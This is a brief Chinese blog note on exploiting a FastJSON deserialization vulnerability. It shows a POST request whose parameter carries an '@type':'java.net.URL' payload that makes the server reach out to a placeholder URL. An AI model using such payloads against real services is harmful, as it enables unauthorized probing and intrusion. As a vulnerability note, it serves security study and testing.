【笔记】fastjson代码执行漏洞利用 发表于 2024-07-17 更新于 2026-03-17 阅读次数: 116181545721908785前言fastjson由反序列化漏洞引起的代码执行漏洞利用 漏洞利用 如果处理的方法中调用FastJSON将JSON字符串转换为Java对象,且接收了请求参数作为JSON字符串变量,可以修改请求参数为payload request1234POST http://127.0.0.1:8080/Content-Type: application/x-www-form-urlencodedx=Set[{"@type":"java.net.URL", "val": "<url>"}] 完成